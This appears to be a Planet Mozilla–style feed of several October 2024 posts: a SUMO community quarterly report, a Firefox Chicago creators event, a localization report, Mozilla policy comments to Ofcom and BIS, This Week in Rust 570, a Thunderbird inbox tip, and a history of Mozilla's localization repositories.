  • Our top contributor on Twitter this quarter was Isaac H who responded to over 200 tweets, expertly navigating our channels to share helpful resources, provide troubleshooting support, and help redirect feature requests to Mozilla Connect. Thank you, Isaac!
  • On the play store, our top contributor was Dmitry K who replied to over 400 reviews! Thank you for giving helpful feedback, advice and for providing such a warm and welcoming experience for users.

SUMO platform updates: There were 5 major platform updates in Q3. Our focus this quarter was to improve navigation for users by introducing new standardized topics across products, and update the forum moderation tool to allow our support agents to moderate these topics for forum posts. Categorizing questions more accurately with our new unified topics will provide us with a foundation for better data analysis and reporting.

We also introduced improvements to our messaging features, localized KB display times, fixed a bug affecting pageviews in the KB dashboard, and added a spam tag to make moderation work easier for the forum moderators.

We acknowledge there was a significant increase in spam questions beginning in July, which is now starting to trend downwards. We will continue to monitor the situation closely, and are taking note of moderator recommendations for a future resolution. We appreciate your efforts to help us combat this problem!

Check out SUMO Engineering Board to see what the platform team is cooking up in the engine room. You’re welcome to join our monthly Community Calls to learn more about the latest updates to Firefox and chat with the team.

Firefox Releases: We released Firefox 128, Firefox 129 and Firefox 130 in Q3 and we made significant updates to our wiki template for the Firefox train release.

Q4 Priorities & Focus Areas

  • CX: Enhancing the user experience and streamlining support operations.
  • Kitsune: Improved article helpfulness survey and tagging improvements to help with more granular content categorization.
  • SUMO: For the rest of 2024, we’re working on an internal SUMO Community Report, FOSDEM 2025 preparation, Firefox 20th anniversary celebration, and preparing for an upcoming Community Campaign around QA.

Contributor Spotlights

We have seen 37 new contributors this year, with 10 new contributors joining the team this quarter. Among them were ThePillenwerfer, Khalid, Mozilla-assistent, and hotr1pak, who together shared more than 100 contributions between July and September. We appreciate your efforts!

Cheers to our top contributors this quarter:

SUMO top contributors in Q3

Our multi-channel contributors made a significant impact by supporting the community across more than one channel (and in some cases, all three!) 

All in all it was an amazing quarter! Thanks for all you do.

Important dates

  • October 29th: Firefox 132 will be released
  • October 30th: RSVP to join our next Community Call! All are welcome. We do our best to create a safe space for everyone to contribute. You can join on video or audio, at your discretion. You are also welcome to share questions in advance via the contributor forum, or our Matrix channel.
  • November 9th: Firefox’s 20th Birthday!
  • November 14th: Save the date for an AMA with the Firefox leadership team
  • FOSDEM ’25: Stay tuned! We’ll put a call out for volunteers and for talks in early November

Stay connected

Thanks for reading! If you have any feedback or recommendations on future features for this update, please reach out to Kiki and Andrea.

The Mozilla BlogCelebrating Chicago’s creators and small businesses at Firefox’s ‘Free to Browse’ event

With winter on the horizon, Chicago is ready to show that nothing — not wind, nor snow — can cool the fire of a united community. 

As we toast Firefox’s 20th anniversary, we’re hosting “Free to Browse: Celebrating Chicago’s Creatives,” an IRL browsing experience to amplify the voices of 20 local creators and small businesses. The event will explore how they’re creatively impacting their communities, as well as showcase the innovation that has defined the last 20 years of Firefox’s journey. We’re teaming up with these 20 local small businesses as part of our national campaign “Nothing Personal, Just Browsing,” which highlights that when you choose Firefox, you choose a more private online experience. 

“Free to Browse” is free and open to the public and will take place Nov. 16 from 4:00 p.m. to 10:30 p.m. CT at Inside Town, a local art collective in Chicago that celebrates diverse artists. The three-story space will bring the online world to life through a completely immersive experience. Guests can “browse” the skills of the featured small businesses, explore their services and shop for exclusive items, goods and more. It’ll be an engaging environment featuring musical performances and interactive art while celebrating Firefox’s impactful journey and technological legacy. We’re all about making the web a private and safe open space for everyone, and there’s no better way to cultivate that than with music, art, food and community.

The best parts of the internet are built by the communities that shape them. We’re proud to celebrate these 20 bold and innovative businesses in Chicago that, like Firefox, are community-focused and not afraid to be different and challenge the status quo: 

1. Lon Renzell, music producer/engineer and the founder of Studio SHAPES, a recording studio for musical creativity. | @renzell.wav

2. Kevin Woods, founder of streetwear brand and re-sale store, “The Pop Up.” | @ogkwoods

3. Tatum Lynea, executive pastry chef and partner, named Chicago’s 2024 pastry chef of the year. |  @tatumlynea

4. Demir Mujagic, founder of Published Studios, a specialty design/print boutique. | @published.studios 

5. Prosper Bambo, founder of Congruent Space, an interactive platform integrating art, design and fashion. | @prosperbambo

6. Akele Parnell, co-founder of ÜMI Farms, a cannabis ecosystem which includes craft brands and retail dispensaries. | @akele_j 

7. Makafui Searcy, conceptual designer and founding director of the Fourtunehouse Art Center. | @makafuikofisearcy

8. Oluwaseyi Adeleke, creative director and fashion designer, focused on storytelling through a Black lens. | @olu.originals 

9. Manny Mendoza, co-founder and chef of Herbal Notes, a cannabis lifestyle and experience collective. | @chefmanofrom18th

10. Angelica Rivera, founder of Semillas, a Mexican and Puerto Rican-owned floral design, plant, event experiences and coffee shop. | @sincerelyanngee  

11. Kristoffer McAfee, artist/designer/traveler/scholar/business owner. | @km_designhq

12. Damiane Nickles, painter/marketer and founder of “Not A Plant Shop.” | @notaplantshop

13. Danielle Moore, founder and creative director of Semicolon Books. | @danni.aint.write

14. Trevor Holloway, founder of Inside Town art collective. | @trevorholloway

15. Nicole Humphrey, creative consultant and founder of NAHcreate. | @childofgenius

16. Jason Ivy, singer-songwriter, actor and filmmaker. | @thejasonivy

17. Jackson Flores, co-founder of DishRoulette Kitchen, an SMB development center dedicated to addressing economic inequality. | @jacksonsays

18. Andre Muir, visual artist and filmmaker. | @andremuir

19. Diana Pietrzyk, multidimensional creative, designer and artist.  | @dyanapyehchek

20. Preme, interdisciplinary artist, co-founder of Congruent Space and art director for Chicago music collective Goodbye Tomorrow. | @preme___xy 

Here’s a preview of the art these brilliant creators will have on display at the event:

This celebration isn’t just about the past 20 years of Firefox. It’s a stepping stone for the next 20 years of building an open and accessible internet for all. We’re excited to kick it off with an unforgettable experience in Chicago.

See you there!

Get Firefox

Get the browser that protects what’s important

The post Celebrating Chicago’s creators and small businesses at Firefox’s ‘Free to Browse’ event appeared first on The Mozilla Blog.

Mozilla Localization (L10N)L10n report: October 2024 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

New community/locales added

We’re grateful for the Abkhaz community’s initiative in reaching out to localize our products. Thank you for your valuable involvement!

New content and projects

What’s new or coming up in Firefox desktop

Search Mode Switcher

A new feature in development has become available (behind a flag) with the release of the latest Nightly version 133: the Search Mode Switcher. You may have already seen strings for this land in Pontoon. The feature enables you to enter a search term into the address bar and search it through multiple engines. After entering the search term and selecting a provider, the search term will persist (instead of showing the site’s URL), and you can then select a different provider by clicking an icon on the left of the bar.

Firefox Search Mode Switcher

You can test this now in version 133 of Nightly by entering about:config in the address bar and pressing Enter, proceeding past the warning, and searching for the following flag: browser.urlbar.scotchBonnet.enableOverride. Toggling the flag to true will enable the feature.

New profile selector

Starting in Version 134 of Nightly a new feature to easily select, create, and change profiles within Firefox will begin rolling out to a small number of users worldwide. Strings are planned to be made available for localization soon.

Sidebar and Vertical Tabs

Finally, as mentioned in the previous L10n Report, features for a new sidebar with expanded functionality, along with the ability to change your tab layout from horizontal to vertical, are available to test in Nightly through the Firefox Labs feature in your settings. Just go to your Nightly settings, select the Firefox Labs section on the left, and enable the feature by clicking the checkbox. Since these are experimental, there may continue to be occasional string changes or additions. While you check out these features in your languages, if you have thoughts on the features themselves, we welcome you to share feedback through Mozilla Connect.

What’s new or coming up in web projects

AMO and AMO Frontend

To improve user experience, the AMO team plans to implement changes that will enable only locales meeting a specific completion threshold. Locales with very low completion percentages will be disabled in production but will remain available on Pontoon for teams to continue working on them. The exact details and timeline will be communicated once the plan is finalized.

Mozilla Accounts

Currently, Mozilla Accounts is going through a redesign of the user experience of some of its log-in pages, so we will continue to see small updates here and there for the rest of the year. There is also a planned update to the Mozilla Accounts payments sub-platform. We expect a new file to be added to the project before the end of the year, but a large number of the strings will be the same as now. We will be migrating those translations so they don’t need to be translated again, but there will be a number of new strings as well.

Mozilla.org

The Mozilla.org site is undergoing a series of redesigns, starting with updates to the footer and navigation bars. These changes will continue through the rest of the year and beyond. The next update will focus on the About page. Additionally, the team is systematically removing obsolete strings and replacing them with updated or new strings, ensuring you have enough time to catch up while minimizing effort on outdated content.

There are a few new Welcome pages made available to a select few locales. Each of these pages has a different deadline. Make sure to complete them before they are due.

What’s new or coming up in SUMO

The SUMO platform just got a navigation redesign in July to improve navigation for users & contributors. The team also introduced new topics that are standardized across products, which lay the foundation for better data analysis and reporting. Most of the old topics, and their associated articles and questions, have been mapped to the new taxonomy, but a few remain that will be manually mapped to their new topics.

On the community side, we also introduced improvements and fixes to the messaging feature, changed the KB display time to a format appropriate to the locale, fixed a bug so pageview numbers display properly in the KB dashboard, and added a spam tag to the question list when a question is marked as spam, to make moderation work easier for the forum moderators.

There will be a community call coming up on Oct 30 at 5pm UTC where we will be talking about Firefox 20th anniversary celebration and Firefox 132 release. Check out the agenda for more detail.

What’s new or coming up in Pontoon

Enhancements to Pontoon Search

We’re excited to announce that Pontoon now allows for more sophisticated searches for strings, thanks to the addition of the new search panel!

When searching for a string, clicking on the magnifying glass icon will open a dropdown, allowing users to select any combination of search options to help refine their search. Please note that the default search behavior has changed, as string identifiers must now be explicitly enabled in search options.

Pontoon Enhanced Search Options

User status banners

As part of the effort to introduce badges/achievements into Pontoon, we’ve added status banners under user avatars in the translation workspace. Status banners reflect the permissions of the user within the respective locale and project, eliminating the need to visit their profile page to view their role.

Namely, team managers will get the ‘MNGR’ tag, translators get the ‘TRNSL’ tag, project managers get the ‘PM’ tag, and those with site-wide admin permissions receive the ‘ADMIN’ tag. Users who have joined within the last three months will get the ‘NEW USER’ tag for their banner. Status banners also appear in comments made under translations.

Screenshot of Pontoon showing the Translate UI, with a user displaying the new banner for Manager and Admin

New Pontoon logo

We hope you love the new Pontoon logo as much as we do! Thanks to all of you who expressed your preference by participating in the survey.

Pontoon New Logo

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Mozilla Privacy BlogMozilla Participates in Ofcom’s Consultation on its Draft Transparency Reporting Guidance

On 4th October 2024, Mozilla provided our input to Ofcom’s consultation on its draft transparency reporting guidance. Transparency plays a crucial role in promoting accountability and public trust, particularly when it comes to how tech platforms handle harmful or illegal content online, and we were pleased to share our research, insights, and input with Ofcom.

Scope of the Consultation

Ofcom’s proposed guidance aims to improve transparency reporting, allowing the public, researchers, and regulators to better understand how categorized services operate and whether they are doing enough to respect users’ rights and protect users from harm.

We support this effort and believe additional clarifications are needed to ensure that Ofcom’s transparency process fully meets its objectives. The following clarifications will ensure that the transparency reporting process effectively holds tech companies accountable, safeguards users, fosters public trust, and allows for effective use of transparency reporting by different stakeholders.

The Importance of Standardization

One of our key recommendations is the need for greater standardization in transparency elements. Mozilla’s research on public ad repositories developed by many of the largest online platforms finds that there are large discrepancies across these transparency tools, making it difficult for researchers and regulators to compare information across platforms.

Ofcom’s guidance must ensure that transparency reports are clear, systematic, and easy to compare year-to-year. We recommend that Ofcom provide explicit guidelines on the specific data platforms must provide in their transparency reports and the formats in which they should be reported. This will enable platforms to comply uniformly and make it easier for regulators and researchers to monitor patterns over time.

In particular, we encourage Ofcom to distinguish between ‘core’ and ‘thematic’ information in transparency reports. We understand that core information will be required consistently every year, while thematic data will focus on specific regulatory priorities, such as emerging areas of concern. However, it is important that platforms are given enough advance notice to prepare their systems for thematic information to avoid any disproportionate compliance burden. This is particularly important for smaller businesses who have limited resources and may find it challenging to comply with new reporting criteria, compared to big tech companies.

We also recommend that data about content engagement and account growth should be considered ‘core’ information that needs to be collected and reported on a regular basis. This data is essential for monitoring civic discourse and election integrity.

Engaging a Broader Range of Stakeholders

Mozilla also believes that a broad range of stakeholders should be involved in shaping and reviewing transparency reporting. Ofcom’s consultative approach with service providers is commendable.  We encourage further expansion of this engagement to include stakeholders such as researchers, civil society organizations, and end-users.

Based on our extensive research, we recommend “transparency delegates.” Transparency delegates are experts who can act as intermediaries between platforms and the public, by using their expertise to evaluate platforms’ transparency in a particular area (for example, AI) and to convey relevant information to a wider audience. This could help ensure that transparency reports are accessible and useful to a range of audiences, from policymakers to everyday users who may not have the technical expertise to interpret complex data.

Enhancing Data Access for Researchers

Transparency reports alone are not enough to ensure accountability. Mozilla emphasizes the importance of giving independent researchers access to platform data. In our view, data access is not just a tool for academic inquiry but a key component of public accountability. Ofcom should explore mechanisms for providing researchers with access to data in a way that protects user privacy while allowing for independent scrutiny of platform practices.

This access is crucial for understanding how content moderation practices affect civic discourse, public safety, and individual rights online. Without it, we risk relying too heavily on self-reported data, which can be inconsistent or incomplete.  Multiple layers of transparency are needed, in order to build trust in the quality of platform transparency disclosures.

Aligning with Other Regulatory Frameworks

Finally, we encourage Ofcom to align its transparency requirements with those set out in other major regulatory frameworks, particularly the EU’s Digital Services Act (DSA). Harmonization will help reduce the compliance burden on platforms and allow users and researchers to compare transparency reports more easily across jurisdictions.

Mozilla looks forward to continuing our work with Ofcom and other stakeholders to create a more transparent and accountable online ecosystem.

 

The post Mozilla Participates in Ofcom’s Consultation on its Draft Transparency Reporting Guidance appeared first on Open Policy & Advocacy.

This Week In RustThis Week in Rust 570

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is trait-gen, an attribute macro to generate the trait implementations for several types without needing custom declarative macros, code repetition, or blanket implementations.

Thanks to Luke Peterson for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.
Crates Ecosystem

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

464 pull requests were merged in the last week

Rust Compiler Performance Triage

Some tidy improvements from switching to the next-generation trait solver (solely for coherence checking) and from simplifying our dataflow analysis framework. There were some binary size regressions associated with PR 126557 (adding #[track_caller] to allocating methods of Vec and VecDeque), which I have handed off to T-libs to choose whether to investigate further.

Triage done by @pnkfelix. Revision range: 5ceb623a..3e33bda0

0 Regressions, 3 Improvements, 6 Mixed; 3 of them in rollups. 47 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo Language Team
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Reference Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-23 - 2024-11-20 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Your problem is that you’re trying to borrow from the dead.

/u/masklinn on /r/rust

Thanks to Maciej Dziardziel for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Mozilla ThunderbirdMaximize Your Day: Focus Your Inbox with ‘Grouped by Sort’

For me, staying on top of my inbox has always seemed like an unattainable goal. I’m not an organized person by nature. Periodic and severe email anxiety (thanks, grad school!) often meant my inbox was in the quadruple digits (!).

Lately, something’s shifted. Maybe it’s working here, where people care a lot about making email work for you. These past few months, my inbox has stayed, if not manageable, then pretty close to it. I’ve only been here a year, which has made this an easier goal to reach. Treating my email like laundry is definitely helping!

But how do you get a handle on your inbox when it feels out of control? R.L. Dane, one of our fans on Mastodon, reminded us Thunderbird has a powerful, built-in tool that can help: the ‘Grouped by Sort’ feature!

Email Management for All Brains

For those of us who are neurodiverse, email management can be a challenge. Each message that arrives in your inbox, even without a notification ding or popup, is a potential distraction. An email can contain a new task for your already busy to-do list. Or one email can lead you down a rabbit hole while other emails pile up around it. Eventually, those emails we haven’t archived, replied to, or otherwise processed take on a life of their own.

Staring at an overgrown inbox isn’t fun for anyone. It’s especially overwhelming for those of us who struggle with executive function – the skills that help us focus, plan, and organize. A full or overfull inbox doesn’t seem like a hurdle we can overcome. We feel frozen, unsure where to even begin tackling it, and while we’re stuck trying to figure out what to do, new emails keep coming. Avoiding our inboxes entirely starts to seem like the only option – even if this is the most counterproductive thing we can do.

So, how in the world do people like us dig out of our inboxes?

Feature for Focus: Grouped by Sort

We love seeing R.L. Dane’s regular Thunderbird tips, tricks, and hacks for productivity. In fact, he was the one who brought this feature to our attention in a Mastodon post! We were thrilled when we asked if we could turn it into a productivity post and got an excited “Yes!” in response.

As he pointed out, using Grouped by Sort, you can focus on more recently received emails. Sorting by Date, this feature will group your emails into the following collapsible categories:

  • Today
  • Yesterday
  • Last 7 Days
  • Last 14 Days
  • Older

Turning on Grouped by Sort is easy. Click the message list display options, then click ‘Sort by.’ In the top third, toggle the ‘Date’ option. In the middle third, select your preferred order, Descending or Ascending. Finally, in the bottom third, toggle ‘Grouped by Sort.’

Now you’re ready to whittle your way through an overflowing inbox, one group at a time.

And once you get down to a mostly empty and very manageable inbox, you’ll want to find strategies and habits to keep it there. Treating your email like laundry is a great place to start. We’d love to hear your favorite email management habits in the comments!

Resources

ADDitude Magazine: https://www.additudemag.com/addressing-e-mail/

Dixon Life Coaching: https://www.dixonlifecoaching.com/post/why-high-achievers-with-adhd-love-and-hate-their-email-inbox

The post Maximize Your Day: Focus Your Inbox with ‘Grouped by Sort’ appeared first on The Thunderbird Blog.

Mozilla Privacy BlogMozilla Responds to BIS’ Proposed Rule on Reporting Requirements for the Development of Advanced AI Models and Computing Clusters

Lately, we’ve talked a lot about the importance of ensuring that governments take into account open source, especially when it comes to AI. We submitted comments to NIST on Dual-Use Foundation Models and NTIA on the benefits of openness, and advocated in Congress. As frontier models and big tech continue to dominate the policy discussion, we need to ensure that open source remains top of mind for policymakers and regulators. At Mozilla, we know that open source is a fundamental driver of software that benefits people instead of a few big tech corporations; it helps enable breakthroughs in medicine and science, and it allows smaller companies to compete with tech giants. That’s why we’ll continue to raise the voice of the open source community in regulatory circles whenever we can – and most recently, at the Department of Commerce.

Last month, the Bureau of Industry and Security (BIS) released a proposed rule about reporting requirements for developing advanced AI models and computing clusters. This rule stems from the White House’s 2023 Executive Order on AI, which focuses on the safe and trustworthy development of AI. BIS asked for feedback from industry and stakeholders on topics such as the notification schedule for entities covered by the rule, how information is collected and stored, and what thresholds would trigger reporting requirements for these AI models and clusters.

While BIS’ proposed rule seeks to balance national security with economic concerns, it doesn’t adequately take into account the needs of the open source community or provide clarity as to how the proposed rule may affect them. This is critical given some of the most capable and widely used AI models are open source or partially open source. Open source software is a key driver of technological progress in AI and creates tremendous economic and security benefits for the United States. In our full comments, we set out how BIS can further engage with the open-source community and we emphasize the value that open-source offers for both the economy and national security. Below are some key points from our feedback to BIS:

1. BIS should clarify how the proposed rules would apply to open-source projects, especially since many don’t have a specific owner, are distributed globally, and are freely available. Ideally BIS could work with organizations like the Open Source Initiative (OSI) to come up with a framework.

2. As BIS updates the technical conditions for collection thresholds in response to technological advancements, we suggest setting a minimum update cycle of six months. This is crucial given the rapid pace of change in the AI landscape. It’s also necessary to maintain BIS’ core focus on the regulation of frontier models and to not unnecessarily stymie innovation across the broader AI ecosystem.

3. BIS should provide additional clarity about what counts as ‘planned applicable activities’ and when a project is considered ‘planned.’

Mozilla appreciates BIS’s efforts to try and balance the benefits and risks of AI when it comes to national and economic security. We hope that BIS further considers the potential impact of the proposed rule and future regulatory actions on the open source community and appropriately weighs the myriad benefits which open source AI and open source software more broadly produce for America’s national and economic interests. We look forward to providing views as the US Government continues work on these important issues.

The post Mozilla Responds to BIS’ Proposed Rule on Reporting Requirements for the Development of Advanced AI Models and Computing Clusters appeared first on Open Policy & Advocacy.

Francesco LodoloThe (pre)history of Mozilla’s localization repository infrastructure

Many of the new faces joining Mozilla, as either staff or volunteer localizers, are only familiar with the current, more streamlined localization infrastructure.

I thought it might be interesting to take a look back at the technical evolution of Mozilla’s localization systems. Having personally navigated every version — first as a community localizer from 2004 to 2013, and later as staff — I’ll share my perspective. That said, I might not have all the details exactly right (or I may have removed some for the sake of my sanity), so feel free to point out any inaccuracies.

Giovanni (center) and I (left) from Mozilla Italia at a booth to promote Firefox, back in 2007. Probably one of the older photos I have around.

Attending one of the earliest events organized by the Italian Community (2007)

Early days: Centralized version control

Back in the early 2000s, smartphones weren’t a thing, Windows XP was an acceptable operating system — especially in comparison to Windows Me — and distributed version control systems weren’t as common. Let’s be honest, centralized version control was not fun: every commit meant interacting directly with the server. You had to remember to update your local copy, commit your changes, and then hope no one else had committed in the meantime — otherwise, you were stuck resolving conflicts.

Given the high technical barriers, localizers at that time were primarily technical users, not discouraged by crappy text editors — encoding issues, BOMs, and other amenities — and command line tools.

To make things more complicated, localizers had to deal with 2 different systems:

  • CVS (Concurrent Versioning System) was used for products like Mozilla Suite, Phoenix/Firefox, etc. To increase confusion, it used branch names that followed the Gecko versions (e.g. MOZILLA_1_8_BRANCH), and those didn’t map at all to product versions. Truth be told, the whole release cadence and cycle felt like complete chaos back then, at least as a volunteer.
  • SVN (Subversion) was used to localize mozilla.org, addons.mozilla.org (AMO), and other web projects.

With time, desktop and web-based applications emerged to support localizers, hiding some of the complexity of version control systems and providing translation management features:

  • Mozilla Translator (a local Java application. Yes kids, Java).
  • Narro.
  • Pootle.
  • Verbatim: a customized Pootle instance run by Mozilla, used to localize web projects like addons.mozilla.org. This was shut down in 2015 and projects transitioned to Pontoon.
  • Pontoon (here’s the first idea and repository, if you’re curious).
  • Aisle, an internal experiment based on C9 that never got past the initial tests.

This proliferation of new tools led to a couple of key principles that are still valid to this day:

  • The repository, not the TMS (Translation Management System), is the source of truth.
  • TMSs need to support bidirectional synchronization between their internal data storage and the repository, i.e. they need to read updated translated content from the repository and store it internally (establishing a conflict resolution policy), not just write updates.

This might look trivial, but it’s an outlier in the localization industry, where the tool is the source of truth, and synchronization only happens in one direction (from the TMS to the repository).

The shift to Mercurial

At the end of 2007, Mozilla made the decision to transition from CVS to Mercurial, this time opting for a distributed version control system. For localization, this meant making the move to Mercurial as well, though it took a few more months of work. This marked the beginning of a new era where the infrastructure quickly started becoming more complex.

As code development was happening in mozilla-central, localization was supposed to be stored in a matching l10n-central repository. But here’s the catch: instead of one repository, the decision was to use one repository per locale, each one including the localization for all shipping projects (Firefox, Firefox for Android, etc.). I’m not sure how many repositories that meant at the time — based on the dependencies of this bug, probably around 30 — but as of today, there are 156 l10n-central repositories, while Firefox Nightly only ships in 111 locales (a few of them added recently).

The next massive change was the adoption of the rapid release cycle in 2011:

  • 3 new sets of repositories had to be created for the corresponding Firefox versions: l10n/mozilla-aurora, l10n/mozilla-beta, l10n/mozilla-release.
  • Localizers working against Nightly in l10n-central would need to manually move their updates to l10n/mozilla-aurora, which was becoming the main target for localization.
  • At the end of the cycle (“merge day”), someone in the localization team would manually move content from Aurora to Beta, overwriting any changes.
  • In order to allow localizers to make small fixes to Beta, 2 separate projects were set up in Pontoon (one working against Aurora, one against Beta), and it was up to localizers to keep them in sync, given that content in Beta would be overwritten on merge day.

If you’re still trying to keep count, we’re now at about 600 Mercurial repositories to localize a project like Firefox (and a few hundreds more added later for Firefox OS, one for each locale and version, but that’s a whole different story).

I won’t go into the fine details, but at this point localizers were also supposed to “sign off” on the version of their localization that they wanted to ship. Over time, this was done by:

  • Calling out which changeset you wanted to ship in an email thread.
  • Later, requesting sign-off in a web app called Elmo (because it was hosted on l10n.mozilla.org, (e)l.m.o., got it?). Someone in the localization team had to manually go through each request, check the diff from the previous sign-off to ensure that it would not break Firefox, and either accept or reject it. For context, at the time DTDs were still heavily in use for localization, and a broken translation could easily brick the browser (yellow screen of death). 
  • With the drop of Aurora in 2017, the localization team started reviewing and managing sign-offs in Elmo without waiting for localizers to make a request. Yay for localizers, one less thing to do.
  • In 2020, partly because of the lay-offs that impacted the team, we completely dropped the sign-off process and decommissioned Elmo, automatically taking the latest changeset in each l10n repository.
Sad Elmo sitting on a park bench, in gloomy weather, with rain puddles on the street.

The new kid on the block: GitHub

In 2015 we started migrating repositories from SVN to GitHub. At the time, that meant mostly web projects, managed by Pascal Chevrel and me, with the notable exception of Firefox for iOS. That part of localization had a whole infrastructure of its own: a web dashboard to track progress, a tool called langchecker to update files and identify errors, and even a file format called dotlang (.lang) that was used for a while to localize mozilla.org (we switched to Fluent in 2019).

The move to GitHub removed a lot of bureaucracy, as the team could create new repositories and grant access to localizers without going through an external team, as was the case for Mercurial. Still today, GitHub is the go-to choice for new projects, although the introduction of SAML single sign-on created a significant hurdle when it comes to adding external contributors to a project.

Introduction of cross-channel for Firefox

Remember the 600 repositories? Still there… Also, the most observant among you might wonder: didn’t Mozilla have another version of Firefox (Extended Support Release, or ESR)? You’re correct, but the compromise there was that ESR would be string-frozen, so we didn’t need another ~150 repositories: we used the content from mozilla-release at the time of launch, and that’s it, no more updates.

In 2017, the Aurora channel was “removed”, leaving Nightly (based on mozilla-central), Developer Edition and Beta (based on mozilla-beta), Release (based on mozilla-release) and ESR. I use quotes, because “aurora” is still technically the internal channel name for Dev Edition.

That was a challenge, as Aurora represented the main target for localization. That change forced us to move all locales to work on Nightly around April 2017. 

Later in the year, Axel Hecht came up with a core concept that still supports how we localize Firefox nowadays: cross-channel. What if, instead of having to extract strings from 4 huge code repositories, we create a tool that generates a superset of the strings shipping in all supported versions (channels) of Firefox, and put them in a nimble, string-only repository? That’s exactly what cross-channel did, allowing us to drop ~300 repositories (plus ~150 already dropped because of the removal of Aurora). It also gave us the opportunity to support localization updates in release and ESR. At this point, localization for any shipping version of Firefox comes out of a single repository for each locale (e.g. l10n-central/fr for French).
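
A toy illustration of the superset idea (this is not the actual cross-channel tool, and the file handling is heavily simplified): take the string IDs exposed by each shipping channel and merge them into one set, keeping strings that only exist in older channels and letting the newest channel win for shared IDs.

```python
# Each channel's repository exposes a mapping of string IDs to en-US source text.
# Hypothetical data; the real tool walks actual localization files in each repository.
channels = {
    "release": {"tab-close": "Close tab", "bookmark-add": "Bookmark this page"},
    "beta":    {"tab-close": "Close tab", "reader-toggle": "Toggle reader view"},
    "central": {"tab-close": "Close Tab", "pip-toggle": "Toggle picture-in-picture"},
}

def build_cross_channel(channels: dict) -> dict:
    """Build a superset of all strings shipping in any channel.

    Strings only present in older channels are kept, so release/ESR can still
    receive localization updates; for shared IDs the newest channel wins.
    """
    superset = {}
    # Oldest first, so newer channels overwrite shared IDs.
    for name in ("release", "beta", "central"):
        superset.update(channels[name])
    return superset

print(build_cross_channel(channels))
```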

Chart representing the flow in the build system with cross-channel.

Code repositories are used to generate cross-channel content, which in turn is used to feed Pontoon, storing translations in l10n-central repositories. From the chart, it’s also visible how English (en-US) is treated as a special case, going directly from code repositories to the build system.

In hindsight, cross-channel was overly complex: it would not only create the superset content, but it would also replay the Mercurial history of the commit introducing the change. The content would land in the cross-channel repository with a reference to the original changeset (example), making it possible to annotate the file via Mercurial’s web interface. In order to do that, the code hooked directly into Mercurial internals, and it would break frequently thanks to the complexity of Mozilla’s repositories. In 2021 the code was changed to stop replaying history and only merging content.

At this point, in late 2017, Firefox localization relied on ~150 l10n repositories, and 2 source repositories for cross-channel — one used as a quarantine, the other, called gecko-strings, connected to Pontoon to expose strings for community localization.

Current Firefox infrastructure

Fast-forward to 2024, with Mozilla’s decision to move development to Git, we had an opportunity to simplify things even further, and rethink some of the initial choices:

Thunderbird has adopted a similar structure, with their own 3 repositories.

The team completed the migration to Git in June, ahead of the rest of the organization, and all current versions of Firefox ship from the firefox-l10n repository (including ESR 115 and ESR 128).

Visual timeline of changes described in the article, from CVS to Git.

Conclusions

So, this was the not-so-short story of how Mozilla’s localization infrastructure has evolved over time, with a focus on Firefox. Looking back, it’s remarkable to see how far we’ve come. Today, we’re in a much better place, also considering the constant effort to improve Pontoon and other tools used by the community.

As I approach one of my many anniversaries — I have one for when I started as a volunteer (January 2004), one for when I became a member of staff as a contractor (April 2013), and an “official” one for when I became an employee (November 2018) — it’s humbling to think about what a small team has accomplished over the past 22 years. These milestones remind me of the incredible contributions of so many brilliant individuals at Mozilla, whose passion helped build the foundations we stand on today.

It’s also bittersweet to go back and read emails from over 15 years ago, remembering just how pivotal the community was in shaping Firefox into what it is today. The dedication of volunteers and localizers helped make Firefox a truly global browser, and their impact is still felt — and sometimes missed — today.

